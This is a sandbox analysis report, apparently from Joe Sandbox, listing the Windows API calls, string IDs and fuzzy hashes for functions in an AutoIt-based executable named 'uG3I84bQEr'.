                                                            • GetWindowRect.USER32(00000000), ref: 004849E6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                                            • DestroyWindow.USER32(?), ref: 00484A74
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                                            • IsWindowVisible.USER32(?), ref: 00484B29
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                                            • GetWindowRect.USER32(?,?), ref: 00484B70
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                                            • CopyRect.USER32(?,?), ref: 00484BC7
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                            • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                                            • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                                            • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                                            • _wcscpy.LIBCMT ref: 00464500
                                                            • _wcscmp.LIBCMT ref: 0046450B
                                                            • _wcscat.LIBCMT ref: 00464521
                                                            • _wcsstr.LIBCMT ref: 0046452C
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                                            • _wcscat.LIBCMT ref: 00464591
                                                            • _wcscat.LIBCMT ref: 00464598
                                                            • _wcsncpy.LIBCMT ref: 004645C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: 53d0201630e263c5990b269de9c0b8710adae52f837daff250be36eb893d5207
                                                            • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                                            • Opcode Fuzzy Hash: 53d0201630e263c5990b269de9c0b8710adae52f837daff250be36eb893d5207
                                                            • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                            • GetStockObject.GDI32(00000011), ref: 004029CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                              • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                              • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                              • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                              • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: 0ddfe26c217068a9ad73fc7eeebea318cc8e3801df756c5088895dcd405de17b
                                                            • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                                            • Opcode Fuzzy Hash: 0ddfe26c217068a9ad73fc7eeebea318cc8e3801df756c5088895dcd405de17b
                                                            • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                                            • __swprintf.LIBCMT ref: 0045A51B
                                                            • _wcscmp.LIBCMT ref: 0045A52E
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                                            • _wcscmp.LIBCMT ref: 0045A5BF
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                                            • GetDlgCtrlID.USER32(?), ref: 0045A648
                                                            • GetWindowRect.USER32(?,?), ref: 0045A67E
                                                            • GetParent.USER32(?), ref: 0045A69C
                                                            • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                                            • _wcscmp.LIBCMT ref: 0045A731
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                                            • _wcscmp.LIBCMT ref: 0045A76B
                                                              • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                            • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                                            • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                                                            • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                                            • _wcscmp.LIBCMT ref: 0045AF29
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                                            • _wcscmp.LIBCMT ref: 0045AF8C
                                                            • _wcsstr.LIBCMT ref: 0045AF9D
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                                            • _wcscmp.LIBCMT ref: 0045AFE5
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                                            • _wcscmp.LIBCMT ref: 0045B065
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                                            • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                            • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                                            • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                                                            • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                                            APIs
                                                              • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                                              • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                                              • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                                              • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                                            • _wcscat.LIBCMT ref: 0048C6EE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                                            • DragFinish.SHELL32(?), ref: 0048C75E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pD
                                                            • API String ID: 169749273-2933262381
                                                            • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                            • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                            • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                            • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                            • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                            • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                            • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                            • GetCursorInfo.USER32(?), ref: 004750C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
                                                            • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                            • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                            • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                            • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                            APIs
                                                            • _memset.LIBCMT ref: 0048A259
                                                            • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                            • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                            • GetDesktopWindow.USER32 ref: 0048A40D
                                                            • GetWindowRect.USER32(00000000), ref: 0048A414
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                              • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                            • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                            • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                            • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                            • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                            • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                            • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                            APIs
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                            • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                            • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                                                            • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                            • Opcode Fuzzy Hash: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                                                            • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                            APIs
                                                              • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                            • GetFocus.USER32 ref: 0048C20C
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                            • _memset.LIBCMT ref: 0048C342
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                            • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                            Strings
